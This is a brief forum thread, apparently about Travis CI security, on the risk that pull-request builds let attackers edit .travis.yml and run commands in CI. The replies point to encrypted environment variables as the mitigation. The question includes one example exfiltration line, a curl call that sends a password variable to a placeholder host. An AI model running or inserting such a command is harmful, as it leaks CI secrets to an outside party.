A risk about `Build pushed pull requests`

If we enable Build pushed pull requests, PRs will trigger builds.

Anyone can modify .travis.yml file in a PR, that means if Build pushed pull requests is turned on, the attackers can do anything in CI.

Such as:

curl http://example.com/xxx?v=$password

How to get rid of this risk?

Use encrypted environment variables.

Encrypted environment variables are not available to pull requests from forks due to the security risk of exposing such information to unknown code.

https://docs.travis-ci.com/user/environment-variables/#defining-encrypted-variables-in-travisyml

1 Like

You cannot use encrypted variables on PR builds (from forks) due to security risks. https://docs.travis-ci.com/user/pull-requests/#pull-requests-and-security-restrictions

1 Like

Thank you very much

Thank you too

Imprint